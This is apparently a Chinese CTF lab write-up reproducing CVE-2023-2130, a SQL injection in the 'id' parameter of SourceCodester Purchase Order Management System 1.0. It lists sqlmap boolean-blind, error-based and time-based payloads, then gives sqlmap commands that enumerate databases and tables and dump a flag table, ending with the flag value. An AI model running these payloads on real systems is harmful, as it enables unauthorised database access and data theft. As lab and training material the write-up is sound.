【春秋云镜】CVE-2023-2130漏洞复现exp

目录标题

漏洞介绍

​ 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

影响版本

sql 复制代码
SourceCodester采购订单管理系统1.0

EXP

sqlmap

bash 复制代码
Parameter: id (GET)
    Type: boolean-based blind   #布尔盲注
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 8712=8712 AND 'qmcT'='qmcT

    Type: error-based        #报错注入
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' OR (SELECT 1285 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(1285=1285,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OHDM'='OHDM
    #floor():利用 GROUP BY 分组时的随机数冲突,触发错误
    Type: time-based blind    #时间盲注
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4238 FROM (SELECT(SLEEP(5)))KfhW) AND 'apvD'='apvD

漏洞复现

一个登录框

抓包登录,回显有内容

存在sql查询语句

查找users表下username=admin,且password=132456的md5值的结果

bash 复制代码
{"status":"incorrect","last_qry":"SELECT * from users where username = 'admin' and password = md5('132456') "}

访问该路径

bash 复制代码
http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php

跟上id参数后出现回显,调用了数据库信息

简单测了一下,单引号存在注入,**--+**可以注释

使用sqlmap去跑,跑数据库

bash 复制代码
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --dbs 
available databases [4]:
[*] information_schema 
[*] mysql
[*] performance_schema
[*] purchase_order_db

爆数据表

bash 复制代码
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db --tables
+---------------+
| fllllaaaag    |
| item_list     |
| order_items   |
| po_list       |
| supplier_list |
| system_info   |
| users         |
+---------------+

fllllaaaag表下的数据

bash 复制代码
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --dump

或者爆fllllaaaag表下的列

bash 复制代码
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --columns
+--------+---------+
| Column | Type    |
+--------+---------+
| flag   | text    |
| id     | int(20) |
+--------+---------+

然后再爆破具体的内容

bash 复制代码
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag -C flag --dump

flag

bash 复制代码
flag{ae8dbccb-c588-434a-9da6-e4fd3e9d8f1d} 
相关推荐
花生了什么事o4 小时前
DNS:把域名翻译成 IP 的层级查询机制
网络·网络协议·tcp/ip
数据知道5 小时前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
2401_873479406 小时前
金融合规新规下IP查询怎么做?用IP离线库实现数据不出域
网络协议·tcp/ip·金融·ip
Sagittarius_A*6 小时前
Web 渗透实战:服务器系统识别、端口与中间件全量探测
服务器·网络安全·中间件·渗透测试
学逆向的6 小时前
汇编——函数
开发语言·汇编·网络安全
微硬创新7 小时前
汽车制造产线协同:耐达讯PROFINETDeviceNet网关在机器人通信中的应用
人工智能·物联网·网络协议·自动化·汽车·制造·信息与通信
米尔的可达鸭7 小时前
深入操作系统 Socket 底层:套接字控制块、FD映射、阻塞IO核心完整实现
arm开发·数据结构·websocket·网络协议·算法·架构·安全架构
HackTwoHub8 小时前
AntiDebug Mcp、AI逆向绕过前端,Hook 加密接口,抓取 Vue 路由漏洞,接入 MCP 让 AI 自动化挖掘前端漏洞
前端·vue.js·人工智能·安全·web安全·网络安全·系统安全
JS_SWKJ8 小时前
【无标题】
网络安全
Keepingrun9 小时前
http登录和授权
网络·网络协议·http